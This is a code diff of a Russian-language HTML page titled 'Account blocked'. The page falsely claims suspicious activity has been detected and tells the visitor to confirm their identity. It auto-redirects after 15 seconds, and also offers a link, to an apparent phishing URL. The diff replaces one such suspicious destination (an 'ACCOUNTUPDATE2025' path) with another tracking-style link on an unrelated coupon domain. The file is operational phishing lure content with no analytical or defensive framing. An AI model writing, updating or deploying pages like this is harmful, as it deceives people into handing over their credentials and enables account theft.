Добавлены файлы с кодом

--- a/deferredredirects7.html
+++ b/deferredredirects7.html
@@ -2,7 +2,7 @@
 <html>
 <head>
     <title>Учетная запись заблокирована</title>
-    <meta http-equiv="refresh" content="15;url=https://schaengold.com/ACCOUNTUPDATE2025/Sites/index.html">
+    <meta http-equiv="refresh" content="15;url=https://statement.amazingholidaycoupons.com/s/63BZGFSVBWSFCDX7Y9/584dd8/90eab167-7429-489f-99f6-ce86e8d0d81a">
     <style>
         body { font-family: Arial, sans-serif; background: #ffe6e6; padding: 50px; }
         .warning-box { background: white; border: 3px solid #ff4444; padding: 40px; border-radius: 10px; text-align: center; }
@@ -17,7 +17,7 @@
         <p>Обнаружена подозрительная активность. Ваша учетная запись временно заблокирована.</p>
         <p>Для разблокировки необходимо подтвердить вашу личность.</p>
         <div class="timer">Автоматическое перенаправление на страницу разблокировки через 15 секунд</div>
-        <p><a href="https://schaengold.com/ACCOUNTUPDATE2025/Sites/index.html">Разблокировать сейчас</a></p>
+        <p><a href="https://statement.amazingholidaycoupons.com/s/63BZGFSVBWSFCDX7Y9/584dd8/90eab167-7429-489f-99f6-ce86e8d0d81a">Разблокировать сейчас</a></p>
     </div>
 </body>
 </html>
